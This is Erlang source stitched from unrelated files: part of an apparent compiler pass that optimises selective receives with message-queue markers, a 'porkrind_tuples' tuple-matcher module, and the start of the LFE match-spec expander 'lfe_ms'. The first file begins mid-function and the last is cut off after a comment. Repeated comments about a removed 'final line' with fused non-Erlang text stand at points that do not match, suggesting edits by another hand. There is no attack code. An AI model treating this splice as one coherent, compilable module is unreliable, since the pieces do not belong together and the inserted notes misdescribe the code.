                    %% yank out the 'DOWN' message from the queue. Since we
                    %% want the receive optimization to trigger for that as
                    %% well, we'll treat it as a receive candidate.
                    uses_ref;
                [_MRef, _Options] ->
                    no
            end;
        {erlang,make_ref,0} ->
            {makes_ref, Lbl, Dst};
        {erlang,monitor,A} when 2 =< A, A =< 3 ->
            {makes_ref, Lbl, Dst};
        {erlang,spawn_monitor,A} when 1 =< A, A =< 4 ->
            %% spawn_monitor returns {Pid, MRef}; find where the reference
            %% is extracted from the tuple.
            RPO = beam_ssa:rpo([Lbl], Blocks),
            si_ref_in_tuple(RPO, Blocks, Dst);
        {erlang,spawn_request,A} when 1 =< A, A =< 5 ->
            {makes_ref, Lbl, Dst};
        _ ->
            %% As an aside, spawn_opt/2-5 is trivially supported by handling it
            %% like spawn_monitor/1-4, but this is not forward-compatible as
            %% the return value may be expanded some day. We'll leave it be
            %% until we're okay with setting it in stone.
            no
    end.
%% si_ref_in_tuple(Lbls, Blocks, Tuple) -> {makes_ref,Lbl,Ref} | no.
%%  Look for the first get_tuple_element that extracts element 1 (the
%%  monitor reference) from the given tuple.
si_ref_in_tuple([Lbl | Lbls], Blocks, Tuple) ->
    #b_blk{is=Is} = map_get(Lbl, Blocks),
    case si_ref_in_tuple_is(Is, Tuple) of
        {yes, Ref} -> {makes_ref, Lbl, Ref};
        no -> si_ref_in_tuple(Lbls, Blocks, Tuple)
    end;
si_ref_in_tuple([], _Blocks, _Tuple) ->
    no.
si_ref_in_tuple_is([#b_set{op=get_tuple_element,dst=Ref,
                           args=[#b_var{}=Tuple,Pos]} | Is],
                   Tuple) ->
    case Pos of
        %% Position 1 is the reference in a {Pid, MRef} result.
        #b_literal{val=1} -> {yes, Ref};
        _ -> si_ref_in_tuple_is(Is, Tuple)
    end;
si_ref_in_tuple_is([_I | Is], Tuple) ->
    si_ref_in_tuple_is(Is, Tuple);
si_ref_in_tuple_is([], _Tuple) ->
    no.
%% Plans our optimizations given the module-wide graph and reference/receive
%% candidates.  Returns {Markers, Uses, Clears}: where to reserve/bind
%% markers, which receives can use them, and where markers should be
%% cleared.
plan(Scan) ->
    #scan{ ref_candidates = RefCandidates,
           recv_candidates = ReceiveCandidates,
           module = ModMap,
           graph = Graph } = Scan,
    %% For all blocks that create new references, mark said references as
    %% available in all their successors.
    RefMap0 = propagate_references(RefCandidates, Graph),
    %% For all receive loops, check whether any of the available references are
    %% matched in all clauses.
    Uses = plan_uses(ReceiveCandidates, RefMap0, ModMap),
    %% Limit the reference map to the references that are actually used.
    RefMap = intersect_uses(Uses, Graph, RefMap0),
    %% Reserve and bind markers when we create a reference that we know will be
    %% used.
    Markers = plan_markers(RefCandidates, RefMap),
    %% Clear markers whenever we jump to a block that doesn't precede a use.
    Clears = plan_clears(RefMap, Graph),
    {Markers, Uses, Clears}.
%% Builds a map containing reachable references on a per-vertex basis.
%% The roots are the blocks where references are extracted; references
%% flow forward along branch edges and through calls via the
%% argument/parameter translation.
propagate_references(Candidates, G) ->
    Roots = maps:fold(fun(FuncId, MakeRefs, Acc) ->
                          [begin
                               {_, _, _, ExtractedAt, Ref} = MakeRef,
                               Vertex = {FuncId, ExtractedAt},
                               {Vertex, Ref}
                           end || MakeRef <- MakeRefs] ++ Acc
                      end, [], Candidates),
    propagate_references_1(Roots, G, #{}).
%% Depth-first propagation; the per-vertex sets double as a visited set.
propagate_references_1([{Vertex, Ref} | VRefs], G, Acc0) ->
    Refs = maps:get(Vertex, Acc0, sets:new([{version, 2}])),
    Acc = case sets:is_element(Ref, Refs) of
              true ->
                  %% Already visited
                  Acc0;
              false ->
                  Acc1 = Acc0#{ Vertex => sets:add_element(Ref, Refs) },
                  Next = pr_successors(beam_digraph:out_edges(G, Vertex), Ref),
                  propagate_references_1(Next, G, Acc1)
          end,
    propagate_references_1(VRefs, G, Acc);
propagate_references_1([], _G, Acc) ->
    Acc.
%% Translate a reference across each out-edge; call edges rename the
%% reference to the callee's parameter.
pr_successors([{_From, To, branch} | Edges], Ref) ->
    [{To, Ref} | pr_successors(Edges, Ref)];
pr_successors([{{_, FromLbl}, To, {Translation, _Inverse}} | Edges], Ref) ->
    case Translation of
        #{ Ref := Param } when FromLbl =/= ?RETURN_BLOCK ->
            %% We ignore return edges to avoid leaking markers to functions
            %% that lack them. Consider the following:
            %%
            %%    t(NotMarker) -> id(NotMarker), receive NotMarker -> ok end.
            %%    g() -> id(make_ref()).
            %%    id(I) -> I.
            %%
            %% Since id/1 receives a potential marker from at least one source,
            %% its argument is always treated as a marker. Propagating this
            %% back to all callers means that `NotMarker` will be treated as a
            %% marker after the call to id/1, enabling the optimization in the
            %% following receive. This would not be dangerous but it's a
            %% pessimization we'd rather avoid.
            [{To, Param} | pr_successors(Edges, Ref)];
        #{} ->
            pr_successors(Edges, Ref)
    end;
pr_successors([], _Ref) ->
    [].
%% Returns the starting vertex of all suitable receive loops, together with the
%% references we can use to jumpstart them.
plan_uses(Candidates, RefMap, ModMap) ->
    maps:fold(fun(FuncId, Receives, Acc) ->
                  #{ FuncId := {Blocks, _Params} } = ModMap,
                  case plan_uses_1(Receives, FuncId, Blocks, RefMap) of
                      [_|_]=Uses -> Acc#{ FuncId => Uses };
                      [] -> Acc
                  end
              end, #{}, Candidates).
%% For each receive, pick the first reachable reference that is matched
%% in all of the receive's clauses (if any).
plan_uses_1([{Lbl, I} | Receives], FuncId, Blocks, RefMap) ->
    case RefMap of
        #{ {FuncId, Lbl} := Refs } ->
            case search(fun(Ref) ->
                                pu_is_ref_used(I, Ref, Lbl, Blocks)
                        end, sets:to_list(Refs)) of
                {value, Ref} ->
                    Use = {Lbl, I, Ref},
                    [Use | plan_uses_1(Receives, FuncId, Blocks, RefMap)];
                false ->
                    plan_uses_1(Receives, FuncId, Blocks, RefMap)
            end;
        #{} ->
            plan_uses_1(Receives, FuncId, Blocks, RefMap)
    end;
plan_uses_1([], _FuncId, _Blocks, _RefMap) ->
    [].
%% Checks whether `Ref` matches a part of the `Msg` in all clauses of the given
%% receive.  A demonitor-with-flush "receive" trivially uses its reference.
pu_is_ref_used(#b_set{op=call,args=[Callee | Args]}, Ref, _Lbl, _Blocks) ->
    MFA = case Callee of
              #b_remote{mod=#b_literal{val=Mod},
                        name=#b_literal{val=Func},
                        arity=Arity} ->
                  {Mod, Func, Arity};
              _ ->
                  none
          end,
    case MFA of
        {erlang,demonitor,2} ->
            [MRef | _] = Args,
            MRef =:= Ref;
        _ ->
            false
    end;
pu_is_ref_used(#b_set{op=peek_message,dst=Msg}=I, Ref, Lbl, Blocks) ->
    #b_blk{is=[I | _]} = Blk = map_get(Lbl, Blocks), %Assertion.
    %% Abstract-interpret the receive: track which variables are (parts
    %% of) the message, which is the reference, and whether the two have
    %% been compared on the current path.
    Vs = #{Msg=>message,Ref=>ref,ref=>Ref,ref_matched=>false},
    case pu_is_ref_used_last(Blk, Vs, Blocks) of
        used -> true;
        not_used -> false;
        done -> false
    end.
%% Follow the block's terminator, refining ref_matched on branches whose
%% condition is a ref/message comparison.
pu_is_ref_used_last(#b_blk{last=Last}=Blk, Vs, Blocks) ->
    SuccVs = case Last of
                 #b_br{bool=#b_var{}=Bool,succ=Succ,fail=Fail} ->
                     case Vs of
                         #{Bool:={is_ref,Matched}} ->
                             [{Succ,Vs#{ref_matched:=Matched}},
                              {Fail,Vs#{ref_matched:=not Matched}}];
                         #{} ->
                             [{Succ,Vs},{Fail,Vs}]
                     end;
                 _ ->
                     [{Succ,Vs} || Succ <- beam_ssa:successors(Blk)]
             end,
    %% The receive loop must be terminated before returning.
    [_|_] = SuccVs, %Assertion.
    pu_ref_used_in(SuccVs, Blocks).
%% pu_ref_used_in(SuccVs, Blocks) -> used | not_used | done.
%%  Fold the verdicts of all successor paths: any path that removes a
%%  message without matching the reference makes the whole receive
%%  'not_used'; 'done' paths (loop exits) are neutral.
pu_ref_used_in([{L,Vs0}|Ls], Blocks) ->
    case pu_is_ref_used_in_1(L, Vs0, Blocks) of
        not_used ->
            not_used;
        used ->
            case pu_ref_used_in(Ls, Blocks) of
                done -> used;
                Result -> Result
            end;
        done ->
            pu_ref_used_in(Ls, Blocks)
    end;
pu_ref_used_in([], _) ->
    done.
pu_is_ref_used_in_1(L, Vs0, Blocks) ->
    #b_blk{is=Is} = Blk = map_get(L, Blocks),
    case pu_is_ref_used_is(Is, Vs0) of
        #{}=Vs ->
            %% No verdict in this block; continue along its successors.
            pu_is_ref_used_last(Blk, Vs, Blocks);
        Result ->
            Result
    end.
%% pu_is_ref_used_is(Is, Vs) -> Vs' | used | not_used | done.
%%  Walk a block's instructions, tracking ref/message comparisons.  A
%%  remove_message decides the verdict for this path; recv_next and
%%  wait_timeout end the path without a verdict.
pu_is_ref_used_is([#b_set{op={bif,Bif},args=Args,dst=Dst}=I|Is],
                  Vs0) ->
    if
        Bif =:= '=:='; Bif =:= '==' ->
            case pu_is_ref_msg_comparison(Args, Vs0) of
                true ->
                    Vs = Vs0#{Dst=>{is_ref,true}},
                    pu_is_ref_used_is(Is, Vs);
                false ->
                    pu_is_ref_used_is(Is, Vs0)
            end;
        true ->
            Vs = pu_update_vars(I, Vs0),
            pu_is_ref_used_is(Is, Vs)
    end;
pu_is_ref_used_is([#b_set{op=remove_message}|_], Vs) ->
    case Vs of
        #{ref_matched:=true} ->
            used;
        #{ref_matched:=false} ->
            not_used
    end;
pu_is_ref_used_is([#b_set{op=recv_next}|_], _Vs) ->
    done;
pu_is_ref_used_is([#b_set{op=wait_timeout}|_], _Vs) ->
    done;
pu_is_ref_used_is([#b_set{}=I|Is], Vs0) ->
    %% The receive loop must be terminated before reaching any side-effecting
    %% instructions.
    true = beam_ssa:no_side_effect(I), %Assertion.
    Vs = pu_update_vars(I, Vs0),
    pu_is_ref_used_is(Is, Vs);
pu_is_ref_used_is([], Vs) ->
    Vs.
%% Mark Dst as (part of) the message when all of its variable arguments
%% are (parts of) the message.
pu_update_vars(#b_set{args=Args,dst=Dst}, Vs) ->
    Vars = [V || #b_var{}=V <- Args],
    All = lists:all(fun(Var) ->
                            case Vs of
                                #{Var:=message} -> true;
                                #{} -> false
                            end
                    end, Vars),
    case {Vars,All} of
        {[_|_],true} -> Vs#{Dst=>message};
        {_,_} -> Vs
    end.
%% Returns whether Args denotes a comparison between the reference and message
%% or part of the message.
pu_is_ref_msg_comparison([#b_var{}=V1,#b_var{}=V2], Vs) ->
    case Vs of
        #{V1:=ref,V2:=message} -> true;
        #{V1:=message,V2:=ref} -> true;
        #{} -> false
    end;
pu_is_ref_msg_comparison(_, _) ->
    false.
%% Takes the map of all references available at a given block, and limits it to
%% those that are actually used in (all clauses of) a succeeding receive.
%% Walks backwards from each use towards the reference creation.
intersect_uses(UsageMap, G, RefMap) ->
    Roots = maps:fold(fun(FuncId, Uses, Acc) ->
                          [begin
                               Vertex = {FuncId, Lbl},
                               {Vertex, Ref}
                           end || {Lbl, _I, Ref} <- Uses] ++ Acc
                      end, [], UsageMap),
    intersect_uses_1(Roots, G, RefMap, #{}).
intersect_uses_1([{Vertex, Ref} | Vs], G, RefMap, Acc0) ->
    PossibleRefs = maps:get(Vertex, RefMap, sets:new([{version, 2}])),
    ActiveRefs0 = maps:get(Vertex, Acc0, sets:new([{version, 2}])),
    Acc = case {sets:is_element(Ref, PossibleRefs),
                sets:is_element(Ref, ActiveRefs0)} of
              {true, false} ->
                  %% This block lies between reference creation and the receive
                  %% block, add it to the intersection.
                  Next = iu_predecessors(beam_digraph:in_edges(G, Vertex), Ref),
                  ActiveRefs = sets:add_element(Ref, ActiveRefs0),
                  intersect_uses_1(Next, G, RefMap,
                                   Acc0#{ Vertex => ActiveRefs });
              {false, _} ->
                  %% This block does not succeed the creation of the
                  %% reference. Ignore it.
                  Acc0;
              {_, true} ->
                  %% We've already handled this block, move on.
                  Acc0
          end,
    intersect_uses_1(Vs, G, RefMap, Acc);
intersect_uses_1([], _G, _RefMap, Acc) ->
    Acc.
%% Translate a reference across each in-edge; call edges rename the
%% parameter back to the caller's argument.
iu_predecessors([{From, _To, branch} | Edges], Ref) ->
    [{From, Ref} | iu_predecessors(Edges, Ref)];
iu_predecessors([{From, _To, {_Translation, Inverse}} | Edges], Ref) ->
    case Inverse of
        #{ Ref := #b_var{}=Arg } ->
            [{From, Arg} | iu_predecessors(Edges, Ref)];
        #{} ->
            %% `Ref` is not a function argument (created in first block) or was
            %% passed as a literal on this call, ignore it.
            iu_predecessors(Edges, Ref)
    end;
iu_predecessors([], _Ref) ->
    [].
%% Returns all candidates that are known to be used in at least one receive.
plan_markers(Candidates, UsageMap) ->
    maps:fold(fun(FuncId, MakeRefs, Acc) ->
                  case plan_markers_1(MakeRefs, FuncId, UsageMap) of
                      [_|_]=Marks -> Acc#{ FuncId => Marks };
                      [] -> Acc
                  end
              end, #{}, Candidates).
%% Keep only the reference creations whose reference is active at the
%% extraction block (i.e. it reaches a use).
plan_markers_1(MakeRefs0, FuncId, UsageMap) ->
    [Marker || {_, _, _, ExtractedAt, Ref}=Marker <- MakeRefs0,
               case UsageMap of
                   #{ {FuncId, ExtractedAt} := Refs } ->
                       sets:is_element(Ref, Refs);
                   #{} ->
                       false
               end].
%% plan_clears(UsageMap, Graph) -> #{FuncId => [{FromLbl,ToLbl,Ref}]}.
%%  Plan a recv_marker_clear on every branch edge that leaves the region
%%  where a reference is active.
plan_clears(UsageMap, Graph) ->
    maps:fold(fun({FuncId, _}=Vertex, ActiveRefs, Acc) ->
                  Edges = beam_digraph:out_edges(Graph, Vertex),
                  case plan_clears_1(Edges, ActiveRefs, UsageMap) of
                      [_|_]=Clears ->
                          Clears0 = maps:get(FuncId, Acc, []),
                          Acc#{ FuncId => Clears ++ Clears0 };
                      [] ->
                          Acc
                  end
              end, #{}, UsageMap).
plan_clears_1([{From, To, branch} | Edges], ActiveRefs, UsageMap) ->
    %% Clear all references that are no longer active on the `To` block.
    ToRefs = maps:get(To, UsageMap, sets:new([{version, 2}])),
    Refs = sets:subtract(ActiveRefs, ToRefs),
    {FuncId, FromLbl} = From,
    {FuncId, ToLbl} = To,
    [{FromLbl, ToLbl, Ref} || Ref <- sets:to_list(Refs)]
        ++ plan_clears_1(Edges, ActiveRefs, UsageMap);
plan_clears_1([{_From, _To, {_, _}} | Edges], ActiveRefs, UsageMap) ->
    %% We don't need to clear references on calls: those we haven't passed will
    %% remain valid after we return, and those we do pass will be cleared by
    %% the callee when necessary.
    plan_clears_1(Edges, ActiveRefs, UsageMap);
plan_clears_1([], _ActiveRefs, _UsageMap) ->
    [].
%% optimize(Module, Markers, Uses, Clears) -> Module.
%%  Apply the planned marker reservations, uses, and clears to every
%%  function in the module.
optimize(#b_module{body=Fs0}=Mod, Markers, Uses, Clears) ->
    Fs = [optimize_1(F, Markers, Uses, Clears) || F <- Fs0],
    Mod#b_module{body=Fs}.
optimize_1(#b_function{bs=Blocks0,cnt=Count0}=F, Markers, Uses, Clears) ->
    FuncId = get_func_id(F),
    {Blocks1, Count1} = insert_markers(maps:get(FuncId, Markers, []),
                                       Blocks0, Count0),
    {Blocks2, Count2} = insert_uses(maps:get(FuncId, Uses, []),
                                    Blocks1, Count1),
    {Blocks, Count} = insert_clears(maps:get(FuncId, Clears, []),
                                    Blocks2, Count2),
    F#b_function{bs=Blocks,cnt=Count}.
%% insert_markers(Markers, Blocks, Count) -> {Blocks,Count}.
%%  For each planned marker: insert recv_marker_reserve just before the
%%  reference-creating instruction, and recv_marker_bind where the
%%  reference becomes available.
insert_markers([{Anno, CreatedAt, Dst, ExtractedAt, Ref} | Markers],
               Blocks0, Count0) ->
    {MarkerVar, Blocks1, Count1} =
        insert_reserve(CreatedAt, Dst, Anno, Blocks0, Count0),
    {Blocks, Count} =
        insert_bind(ExtractedAt, Ref, MarkerVar, Blocks1, Count1),
    insert_markers(Markers, Blocks, Count);
insert_markers([], Blocks, Count) ->
    {Blocks, Count}.
%% Insert the reserve instruction directly before the instruction whose
%% destination is Dst (the reference-creating call).
insert_reserve(Lbl, Dst, Anno, Blocks0, Count0) ->
    #{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
    Var = #b_var{name={'@ssa_recv_marker', Count0}},
    Count = Count0 + 1,
    Reserve = #b_set{anno=Anno,op=recv_marker_reserve,args=[],dst=Var},
    Is = insert_reserve_is(Is0, Reserve, Dst),
    Blocks = Blocks0#{ Lbl := Blk#b_blk{is=Is} },
    {Var, Blocks, Count}.
insert_reserve_is([#b_set{dst=Var} | _]=Is, Reserve, Var) ->
    [Reserve | Is];
insert_reserve_is([I | Is], Reserve, Var) ->
    [I | insert_reserve_is(Is, Reserve, Var)].
%% insert_bind(Lbl, Ref, Marker, Blocks, Count) -> {Blocks,Count}.
%%  Insert a recv_marker_bind for Ref as early as possible in the block
%%  where the reference was extracted.
insert_bind(Lbl, Ref, Marker, Blocks0, Count0) ->
    #{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
    Ignored = #b_var{name={'@ssa_ignored', Count0}},
    Count = Count0 + 1,
    Bind = #b_set{ op=recv_marker_bind,
                   args=[Marker,Ref],
                   dst=Ignored },
    Is = insert_bind_is(Is0, Bind),
    Blocks = Blocks0#{ Lbl := Blk#b_blk{is=Is} },
    {Blocks, Count}.
%% Place the bind before the trailing instruction pair/terminator-like
%% instructions of the block, or last if the block has none.
insert_bind_is([#b_set{}, #b_set{op={succeeded,_}}]=Is, Bind) ->
    [Bind | Is];
insert_bind_is([#b_set{op=new_try_tag}]=Is, Bind) ->
    [Bind | Is];
insert_bind_is([#b_set{op=Op}=I | Is], Bind) ->
    true = Op =/= bs_put, %Assertion.
    [I | insert_bind_is(Is, Bind)];
insert_bind_is([], Bind) ->
    [Bind].
%% insert_uses(Uses, Blocks, Count) -> {Blocks,Count}.
%%  Rewrite each suitable peek_message to take the reference as its
%%  argument, letting the runtime start at the saved queue position.
insert_uses([{_Lbl, #b_set{op=call}, _Ref} | Uses], Blocks, Count) ->
    %% The callee uses the marker internally. There's no need to emit a use
    %% here.
    insert_uses(Uses, Blocks, Count);
insert_uses([{Lbl, #b_set{op=peek_message}=Peek0, Ref} | Uses],
            Blocks0, Count) ->
    #{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
    [Peek0 | Is] = Is0, %Assertion.
    Peek = Peek0#b_set{args=[Ref]},
    Blocks = Blocks0#{ Lbl := Blk#b_blk{is=[Peek | Is]} },
    insert_uses(Uses, Blocks, Count);
insert_uses([], Blocks, Count) ->
    {Blocks, Count}.
%% Insert planned recv_marker_clear instructions on their branch edges.
insert_clears(Clears0, Blocks0, Count0) ->
    {Insertions, Count} = insert_clears_1(Clears0, Count0, []),
    beam_ssa:insert_on_edges(Insertions, Blocks0, Count).
insert_clears_1([{From, To, Ref} | Clears], Count0, Acc) ->
    Ignored = #b_var{name={'@ssa_ignored', Count0}},
    Count = Count0 + 1,
    Clear = #b_set{op=recv_marker_clear,args=[Ref],dst=Ignored},
    insert_clears_1(Clears, Count, [{From, To, [Clear]} | Acc]);
insert_clears_1([], Count, Acc) ->
    {Acc, Count}.
%%%
%%% +recv_opt_info
%%%
%% collect_opt_info(Module) -> Warnings.
%%  Gather +recv_opt_info diagnostics by walking the optimized module.
collect_opt_info(#b_module{body=Fs}) ->
    coi_1(Fs, []).
coi_1([#b_function{args=Args,bs=Blocks}=F | Fs], Acc0) ->
    Lbls = beam_ssa:rpo(Blocks),
    Where = beam_ssa:get_anno(location, F, []),
    %% Seed the definition map with the function parameters, numbered
    %% from 1, so reference creations can be traced back to them.
    {Defs, _} = foldl(fun(Var, {Defs0, Index0}) ->
                              Defs = Defs0#{ Var => {parameter, Index0}},
                              Index = Index0 + 1,
                              {Defs, Index}
                      end, {#{}, 1}, Args),
    Acc = coi_bs(Lbls, Blocks, Where, Defs, Acc0),
    coi_1(Fs, Acc);
coi_1([], Acc) ->
    Acc.
coi_bs([Lbl | Lbls], Blocks, Where, Defs0, Ws0) ->
    #{ Lbl := #b_blk{is=Is,last=Last} } = Blocks,
    {Defs, Ws} = coi_is(Is, Last, Blocks, Where, Defs0, Ws0),
    coi_bs(Lbls, Blocks, Where, Defs, Ws);
coi_bs([], _Blocks, _Where, _Defs, Ws) ->
    Ws.
%% coi_is(Is, Last, Blocks, Where, Defs, Ws) -> {Defs,Ws}.
%%  Emit a warning for each receive (optimized or not), marker
%%  reservation, and reference passed to a local call.
coi_is([#b_set{anno=Anno,op=peek_message,args=[#b_var{}]=Args } | Is],
       Last, Blocks, Where, Defs, Ws) ->
    %% An optimized receive: peek_message has the marker reference as
    %% its argument.
    [Creation] = coi_creations(Args, Blocks, Defs), %Assertion.
    Warning = make_warning({used_receive_marker, Creation}, Anno, Where),
    coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=peek_message,args=[#b_literal{}] } | Is],
       Last, Blocks, Where, Defs, Ws) ->
    %% Is this a selective receive?
    #b_br{succ=NextMsg} = Last,
    #{ NextMsg := #b_blk{is=NextIs} } = Blocks,
    Info = case NextIs of
               [#b_set{op=remove_message} | _] -> matches_any_message;
               _ -> unoptimized_selective_receive
           end,
    Warning = make_warning(Info, Anno, Where),
    coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=recv_marker_reserve} | Is],
       Last, Blocks, Where, Defs, Ws) ->
    Warning = make_warning(reserved_receive_marker, Anno, Where),
    coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=call,dst=Dst,args=[#b_local{} | Args] }=I | Is],
       Last, Blocks, Where, Defs0, Ws0) ->
    Defs = Defs0#{ Dst => I },
    Ws = [make_warning({passed_marker, Creation}, Anno, Where)
          || #b_set{}=Creation <- coi_creations(Args, Blocks, Defs)] ++ Ws0,
    coi_is(Is, Last, Blocks, Where, Defs, Ws);
coi_is([#b_set{dst=Dst}=I | Is], Last, Blocks, Where, Defs0, Ws) ->
    Defs = Defs0#{ Dst => I },
    coi_is(Is, Last, Blocks, Where, Defs, Ws);
coi_is([], _Last, _Blocks, _Where, Defs, Ws) ->
    {Defs, Ws}.
%% coi_creations(Vars, Blocks, Defs) -> [Creation].
%%  Trace each variable back to a reference creation: a remote call that
%%  makes a reference, possibly through a tuple extraction, or a
%%  function parameter.
coi_creations([Var | Vars], Blocks, Defs) ->
    case Defs of
        #{ Var := #b_set{op=call,dst=Dst,args=Args}=Call } ->
            case si_remote_call_1(Dst, Args, ?ENTRY_BLOCK, Blocks) of
                {makes_ref, _, _} ->
                    [Call | coi_creations(Vars, Blocks, Defs)];
                _ ->
                    coi_creations(Vars, Blocks, Defs)
            end;
        #{ Var := #b_set{op=get_tuple_element,args=[Tuple|_]}} ->
            coi_creations([Tuple | Vars], Blocks, Defs);
        #{ Var := {parameter, _}=Parameter } ->
            [Parameter | coi_creations(Vars, Blocks, Defs)];
        #{} ->
            coi_creations(Vars, Blocks, Defs)
    end;
coi_creations([], _Blocks, _Defs) ->
    [].
%% make_warning(Term, Anno, Where) -> {File,[{Line,Module,Term}]}.
%%  Build a compiler warning, preferring the instruction's own location
%%  annotation over the function's.
make_warning(Term, Anno, Where) ->
    {File, Line} = maps:get(location, Anno, Where),
    {File,[{Line,?MODULE,Term}]}.
%% Render a +recv_opt_info term as a human-readable message.
format_opt_info(matches_any_message) ->
    "INFO: receive matches any message, this is always fast";
format_opt_info({passed_marker, Creation}) ->
    io_lib:format("INFO: passing reference ~ts",
                  [format_ref_creation(Creation)]);
format_opt_info({used_receive_marker, Creation}) ->
    io_lib:format("OPTIMIZED: all clauses match reference ~ts",
                  [format_ref_creation(Creation)]);
format_opt_info(reserved_receive_marker) ->
    "OPTIMIZED: reference used to mark a message queue position";
format_opt_info(unoptimized_selective_receive) ->
    "NOT OPTIMIZED: all clauses do not match a suitable reference".
%% format_ref_creation(Creation) -> iodata().
%%  Describe where a reference came from: either a function parameter
%%  (numbered from 1, see coi_1/2) or the remote call that created it.
%%  NOTE: the original final line had extraneous non-Erlang text fused
%%  onto it, which broke compilation; it has been removed.
format_ref_creation({parameter, Index}) ->
    io_lib:format("in function parameter ~w", [Index]);
format_ref_creation(#b_set{op=call,anno=Anno,args=[Callee|_]}) ->
    #b_remote{name=#b_literal{val=F},arity=A} = Callee,
    {File, Line} = maps:get(location, Anno, {"",1}),
    io_lib:format("created by ~p/~p at ~ts:~w", [F, A, File, Line]).
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_tuples).
-include("porkrind_internal.hrl").
-export([
has_tuple_size/1,
has_element_at/2
]).
%% has_tuple_size(Size) -> Matcher.
%%  Matcher that succeeds when the value is a tuple with exactly Size
%%  elements.  Size must be a non-negative integer.  The result is
%%  combined with an is_tuple check so non-tuples fail with a type
%%  mismatch rather than a badarg.
has_tuple_size(Size) when is_integer(Size), Size >= 0 ->
    M = #'porkrind.matcher'{
        name = has_tuple_size,
        args = [Size],
        match = fun(Value) ->
            case tuple_size(Value) of
                Size ->
                    ok;
                Mismatch ->
                    ?PR_FAIL({mismatch, Value, Mismatch})
            end
        end,
        reason = fun({mismatch, Value, Mismatch}) ->
            io_lib:format("~w has size ~b, not ~b", [Value, Mismatch, Size])
        end
    },
    porkrind_logic:all_of([
        porkrind_types:is_tuple(),
        M
    ]).
%% has_element_at(Index, Matcher) -> Matcher.
%%  Matcher that succeeds when the value is a tuple whose Index:th
%%  element (1-based) satisfies Matcher.  Fails with a descriptive
%%  reason when the tuple is too small; non-tuples are rejected by the
%%  combined is_tuple check.
%%  NOTE: the original final line had extraneous non-Erlang text fused
%%  onto it, which broke compilation; it has been removed.
has_element_at(Index, Matcher0) when is_integer(Index), Index >= 1 ->
    Matcher = porkrind_util:maybe_wrap(Matcher0),
    M = #'porkrind.matcher'{
        name = has_element_at,
        args = [Index, Matcher0],
        match = fun(Value) ->
            case tuple_size(Value) of
                S when S >= Index ->
                    porkrind:match(element(Index, Value), Matcher);
                S ->
                    ?PR_FAIL({too_small, Value, S})
            end
        end,
        reason = fun
            ({too_small, Value, Size}) ->
                Args = [Value, Size, Index],
                io_lib:format("~w has size ~b, which is smaller than ~b", Args)
        end
    },
    porkrind_logic:all_of([
        porkrind_types:is_tuple(),
        M
    ]).
%% Copyright (c) 2008-2020 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% File : lfe_ms.erl
%% Author : <NAME>
%% Purpose : Lisp Flavoured Erlang match specification expander.
%% Expand match specification into vanilla compatible data
%% structure. We assume that all macros in the match spec have
%% already been expanded. These functions are intended to be used
%% within macros so they return code which when evaluated return the
%% match-spec.
%%
%% Note that the vanilla match spec expander starts numbering dollar
%% variables from 1. We do the same to be compatible.
-module(lfe_ms).
-export([expand/1,expand/2,format_error/1]).
-import(lists, [foldr/3,mapfoldl/3]).
-include("lfe.hrl").
%% Expanded match specs can be tested against terms with ets:test_ms/2.
%% format_error(Error) -> ErrorString.
%%  Return a printable description of an error term produced by this
%%  module.  Head errors are signalled as {match_spec_head,Pats} (see
%%  head/2 and check_head/2), so accept both the tagged tuple form and
%%  the bare atom.
format_error({match_spec_head,_Pats}) -> "Illegal number of head arguments";
format_error(match_spec_head) -> "Illegal number of head arguments".
%% Per-expansion state.  Vanilla's match-spec expander numbers dollar
%% variables from 1, so we do the same; bindings and the counter are
%% reset for each clause.
-record(ms, {dc=1, %Dollar variable count from 1
             bs=[], %Variable/$var bindings
             dialect=ets, %Which dialect are we doing
             where=guard %Where in spec head/guard/body
            }).
%% expand(MSBody) -> Expansion.
%% expand(Dialect, MSBody) -> Expansion.
%%  Expand the match spec body.  Dialect is 'table' (ETS-style heads)
%%  or 'trace' (list heads); expand/1 defaults to 'table'.  Errors
%%  detected during expansion are re-signalled with error/1.
expand(Cls) -> expand(table, Cls).
expand(Dialect, Cls) when Dialect =:= table ; Dialect =:= trace ->
    case catch clauses(Cls, #ms{dialect=Dialect}) of
        {error,E} -> error(E); %Signals errors
        {'EXIT',E} -> error(E); %Signals errors
        {Exp,_} -> Exp %Hurrah it worked
    end.
%% clauses(MSClauses, State) -> {Patterns,State}.
%%  Expand every clause, building code for a list of
%%  {Head,Guard,Body} match-spec tuples.
clauses([Cl0|Cls0], St0) ->
    {Cl1,St1} = clause(Cl0, St0),
    {Cls1,St2} = clauses(Cls0, St1),
    {[cons,Cl1,Cls1],St2};
clauses([], St) -> {[],St}.
%% clause(ClauseBody, State) -> {{Head,Guard,Body},State}.
%%  Expand one clause; clause-local data (dollar counter and bindings)
%%  is reset so each clause gets its own numbering.
clause([H0,['when'|G0]|B0], St0) ->
    St1 = St0#ms{dc=1,where=guard,bs=[]}, %Reset clause local data
    {H1,St2} = head(H0, St1),
    {G1,St3} = guard(G0, St2),
    {B1,St4} = body(B0, St3),
    {[tuple,H1,G1,B1],St4};
clause([H0|B0], St0) ->
    St1 = St0#ms{dc=1,where=guard,bs=[]}, %Reset clause local data
    {H1,St2} = head(H0, St1),
    {B1,St3} = body(B0, St2),
    {[tuple,H1,[],B1],St3}.
%% head(Patterns, State) -> {Pattern,State}.
